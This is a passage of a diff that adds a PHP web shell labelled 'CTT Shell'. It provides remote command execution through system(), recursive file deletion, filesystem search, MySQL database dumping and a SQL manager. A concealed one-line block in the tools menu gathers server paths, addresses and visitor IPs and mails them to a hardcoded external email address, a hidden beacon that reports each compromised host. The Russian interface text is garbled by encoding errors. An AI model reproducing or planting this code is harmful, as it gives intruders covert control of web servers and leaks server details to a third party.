+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d.$o)) {unlink($d.$o);}
+else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+  $group['read'].$group['write'].$group['execute'].
+  $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("ctsh_getupdate"))
+{
+function ctsh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($ctsh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+if ($cv < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by ctShell.SQL v. ".$cv."
+# Home page: http://.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+if (!$res) {$ret[err][] = mysql_error();}
+else
+{
+ $row = mysql_fetch_row($res);
+ $out .= $row[1].";\n\n";
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+  while ($row = mysql_fetch_assoc($res))
+  {
+$keys = implode("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode("', '", $values); 
+$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+$out .= $sql;
+  } 
+ }
+}
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+fwrite ($fp, $out);
+fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("ctfsearch"))
+{
+function ctfsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+if (is_dir($d.$f))
+{
+ if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+ ctfsearch($d.$f);
+}
+else
+{
+ if ($true)
+ {
+  if (!empty($a[text]))
+  {
+$r = @file_get_contents($d.$f);
+if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+else {$true = strinstr($a[text],$r);}
+if ($a[text_not])
+{
+ if ($true) {$true = false;}
+ else {$true = true;}
+}
+if ($true) {$found[] = $d.$f; $found_f++;}
+  }
+  else {$found[] = $d.$f; $found_f++;}
+ }
+}
+  }
+ }
+ closedir($handle);
+}
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment);
+@ini_set("highlight.default",$highlight_default);
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string","#DD0000"); 
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="Content-Language" content="en-us"><title>
+CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title>
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #105019 1px solid;
+BORDER-TOP: #000000 1px solid;
+BORDER-LEFT:#105019 1px solid;
+BORDER-BOTTOM: #105019 1px solid;
+}
+.tr2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.td2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #000000 1px;
+BORDER-TOP: #cccccc 1px;
+BORDER-LEFT:#cccccc 1px;
+BORDER-BOTTOM: #000000 1px;
+font: 7pt Verdana;
+}
+.tds1 {
+BORDER-RIGHT:  #505050 1px solid;
+BORDER-TOP: #505050 1px solid;
+BORDER-LEFT:#505050 1px solid;
+BORDER-BOTTOM: #505050 1px solid;
+font: 8pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #000000;
+}
+.table2 {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT:buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:visited { COLOR:#00ff3d; TEXT-DECORATION: none}
+A:active {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=JavaScript type=text/javascript> 
+<!-- 
+function branchSwitch(branch) { 
+dom = (document.getElementById); 
+ie4 = (document.all); 
+if (dom || ie4) { 
+var currElement = (dom)? document.getElementById(branch) : document.all[branch]; 
+currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none'; 
+return false; 
+} 
+else return true; 
+} 
+//--> 
+</script> 
+</head>
+<BODY text=#ffffff  Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center>
+<br>
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=90% border=0> 
+<TBODY><TR> 
+<TD class=td1 colSpan=2> 
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0> 
+<TBODY><TR> 
+<TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD> 
+<TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT> 
+<FONT face=Tahoma color=#00ff3d size=1>
+<?
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+?>
+</FONT></SPAN></TD> 
+<TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD> 
+<TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD> 
+</TR></TBODY></TABLE></TD></TR> 
+</tr>
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr><td>
+<font size=2><a href="#" onClick="return branchSwitch('tools')" title="ğàñêğûòü">Èíñòğóìåíòû</a></font> - 
+<div id="tools" style="display: none">
+<?
+if (count($quicklaunch1) > 0)
+{
+ foreach($quicklaunch1 as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+</div> 
+<font size=2><a href="#" onClick="return branchSwitch('info')" title="ğàñêğûòü">Èíôîğìàòîğ</a></font>
+<div id="info" style="display: none">
+<font size=2>
+<b>Ïğîãğàììíîå îáåñïå÷åíèå:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br>
+<b>Ñèñòåìà:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>
+&nbsp;<br>
+<b>Áåçîïàñíîñòü:&nbsp;<?php echo $hsafemode; ?></b>
+<?
+echo "<br>";
+echo "Âåğñèÿ ÏÕÏ: <b>".@phpversion()."</b>";
+echo "<br>";
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "<br>";
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo "<br>";
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+?>
+<?php
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Ñâîáîäíûé ".view_size($free)." of  ".view_size($all)." (".$used_percent."%)</b><br>";
+?>
+</font>
+</div>
+<?
+if ($win)
+{
+?>
+ - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="ğàñêğûòü">Äèñêè</a></font>
+<?
+}
+?>
+<div id="Drive" style="display: none">
+<?
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";}
+else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<b>".$letters;}
+}
+?>
+</div> 
+</td><td width=1>
+<font size=2><a href="<? echo $sul; ?>act=about">About</a></font>
+</td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%"  borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr class=tr1><td>
+<center>
+<?
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+?>
+</center>
+</td></tr></table>
+<?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br>
+<?php
+}
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $sul."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)  {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>Ìåíåäæåğ SQL:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$sul."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td  class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center>
+<li>Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïğîöåññà. </li>
+<li>Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost </li>
+<li>Åñëè ïîğò ÿâëÿåòñÿ ïóñòûì, ïîğò - 3306 (íåïëàòåæ)</li></td>
+<td  class=td2 width="90%" height="1" valign="top">
+<TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2>
+<td class=td2>&nbsp;<b><font size=2 color=#000000>Çàïîëíèòå ôîğìó:</font></b><table><tr class=tr2><td class=td2>Èìÿ:</td>
+<td  class=td2 align=right>Ïàğîëü:</td></tr><form><input type="hidden" name="act" value="sql"><tr>
+<td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td  class=td2 align=right>
+<input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>Õîñò:</td>
+<td class=td2>Ïîğò:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td>
+<td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Ñîåäèíèòåñü"></td></tr><tr>
+<td class=td2></td></tr></form></table></td><?php }
+ else
+ {
+  if (!empty($sql_db))
+  {
+?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_tables($sql_db);
+if (!$result) {echo mysql_error();}
+else
+{
+ echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+}
+  }
+  else
+  {
+?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_dbs($sql_sock);
+if (!$result) {echo mysql_error();}
+else
+{
+ ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+ echo "<option value=\"\">Databases (...)</option>
+";
+ $c = 0;
+ while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+}
+?></select><hr size="1" noshade>Ïîæàëóéñòà, âûáåğèòå áàçó äàííûõ<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  if ($sql_db)
+  {
+echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+echo "</b></center>";
+
+$acts = array("","dump");
+
+if ($sql_act == "query")
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($submit)
+ {
+  if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+}
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo 